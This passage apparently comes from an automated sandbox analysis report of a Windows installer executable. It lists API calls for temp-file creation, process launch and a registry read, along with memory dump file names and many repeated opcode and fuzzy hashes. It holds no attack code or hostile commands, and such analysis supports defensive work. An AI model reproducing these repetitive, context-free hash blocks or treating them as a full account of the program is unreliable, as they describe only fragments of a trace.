                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E25
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                  • String ID: Call
                                                                                                                                                  • API String ID: 3677997916-1824292864
                                                                                                                                                  • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                                                                  • Instruction ID: 2fd967afc3cf920b801d0ff69ba4d64ac6492d281fb7c7a5729fe10eb95daac3
                                                                                                                                                  • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                                                                  • Instruction Fuzzy Hash: F4011A3255020AEADB219F56ED09EDB3BACEF85350F00403AF945D6260D335EA64DBF9

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1057 405b85-405b91 1058 405b92-405bc6 GetTickCount GetTempFileNameW 1057->1058 1059 405bd5-405bd7 1058->1059 1060 405bc8-405bca 1058->1060 1062 405bcf-405bd2 1059->1062 1060->1058 1061 405bcc 1060->1061 1061->1062
                                                                                                                                                  APIs
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405BA3
                                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                  • API String ID: 1716503409-1331003597
                                                                                                                                                  • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                                                  • Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
                                                                                                                                                  • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                                                  • Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                                    • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                                    • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                                    • Part of subcall function 00405665: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                                                    • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3585118688-0
                                                                                                                                                  • Opcode ID: 96a63fcb15c31092515fbc06d8af7092e29a6e5b1bb977936f441355406fc1b0
                                                                                                                                                  • Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
                                                                                                                                                  • Opcode Fuzzy Hash: 96a63fcb15c31092515fbc06d8af7092e29a6e5b1bb977936f441355406fc1b0
                                                                                                                                                  • Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
                                                                                                                                                  APIs
                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00405137
                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405188
                                                                                                                                                    • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                                  • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                                                  • Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
                                                                                                                                                  • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                                                  • Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                                                  Strings
                                                                                                                                                  • Error launching installer, xrefs: 00405678
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                                  • String ID: Error launching installer
                                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                                  • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                                                  • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                                                                                                  • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                                                  • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\________.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 004061E1
                                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\________.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 004061F5
                                                                                                                                                    • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 00406208
                                                                                                                                                  • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 00403347
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                  • API String ID: 4115351271-3144792594
                                                                                                                                                  • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                                                                                                  • Instruction ID: 15e16a0f1bb74d2da72680a3c6f5190242cf739030cfb371398593c950d8801c
                                                                                                                                                  • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                                                                                                  • Instruction Fuzzy Hash: 65D0C92250693171C55236663E06FCF166C8F4A32AF129077F805B90D6DB7C2A8245FE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                                                  • Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
                                                                                                                                                  • Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                                                  • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                                                  • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                                                                                                  • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                                                  • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                                                  • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                                                                                                  • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                                                  • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                                                  • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                                                                                                  • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                                                  • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                                                  • Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
                                                                                                                                                  • Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                                                  • Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                                                                  • Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
                                                                                                                                                  • Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                                                                  • Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                                                  • Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
